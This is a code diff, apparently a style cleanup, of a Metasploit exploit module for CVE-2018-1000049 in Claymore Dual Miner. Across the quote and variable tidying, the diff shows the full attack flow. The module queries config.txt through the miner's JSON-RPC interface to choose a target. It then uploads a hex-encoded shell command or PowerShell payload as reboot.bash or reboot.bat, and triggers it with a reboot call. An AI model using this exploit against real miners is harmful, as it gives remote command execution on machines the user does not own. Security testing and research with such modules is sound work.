@@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2018-1000049'],
           ['URL', 'http://web.archive.org/web/20200809230426/https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution']
         ],
-        'Platform' => ['win', 'linux'],
         'Targets' => [
           [ 'Automatic Target', { 'auto' => true }],
           [
@@ -71,10 +70,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def select_target
     data = {
-      "id" => 0,
-      "jsonrpc" => '2.0',
-      "method" => 'miner_getfile',
-      "params" => ['config.txt']
+      'id' => 0,
+      'jsonrpc' => '2.0',
+      'method' => 'miner_getfile',
+      'params' => ['config.txt']
     }.to_json
     connect
     sock.put(data)
@@ -82,11 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
     tmp = StringIO.new
     tmp << buf
     tmp2 = tmp.string
-    hex = ''
     if tmp2.scan(/\w+/)[7]
-      return self.targets[2]
+      return targets[2]
     elsif tmp2.scan(/\w+/)[5]
-      return self.targets[1]
+      return targets[1]
     else
       return nil
     end
@@ -99,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     data = {
-      "id" => 0,
-      "jsonrpc" => '2.0',
-      "method" => 'miner_getfile',
-      "params" => ['config.txt']
+      'id' => 0,
+      'jsonrpc' => '2.0',
+      'method' => 'miner_getfile',
+      'params' => ['config.txt']
     }.to_json
     connect
     sock.put(data)
@@ -130,30 +128,30 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
   end
 
-  def execute_command(cmd, opts = {})
+  def execute_command(cmd, _opts = {})
     target = select_target
     case target['Platform']
     when 'linux'
       cmd = Rex::Text.to_hex(cmd, '')
       upload = {
-        "id" => 0,
-        "jsonrpc" => '2.0',
-        "method" => 'miner_file',
-        "params" => ['reboot.bash', "#{cmd}"]
+        'id' => 0,
+        'jsonrpc' => '2.0',
+        'method' => 'miner_file',
+        'params' => ['reboot.bash', "#{cmd}"]
       }.to_json
     when 'windows'
       cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
       upload = {
-        "id" => 0,
-        "jsonrpc" => '2.0',
-        "method" => 'miner_file',
-        "params" => ['reboot.bat', "#{cmd}"]
+        'id' => 0,
+        'jsonrpc' => '2.0',
+        'method' => 'miner_file',
+        'params' => ['reboot.bat', "#{cmd}"]
       }.to_json
     end
 
     connect
     sock.put(upload)
-    buf = sock.get_once || ''
+    sock.get_once || ''
     trigger_vulnerability
   rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
     fail_with(Failure::UnexpectedReply, e.message)
@@ -163,13 +161,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_vulnerability
     execute = {
-      "id" => 0,
-      "jsonrpc" => '2.0',
-      "method" => 'miner_reboot'
+      'id' => 0,
+      'jsonrpc' => '2.0',
+      'method' => 'miner_reboot'
     }.to_json
     connect
     sock.put(execute)
-    buf = sock.get_once || ''
+    sock.get_once || ''
     disconnect
   end
 
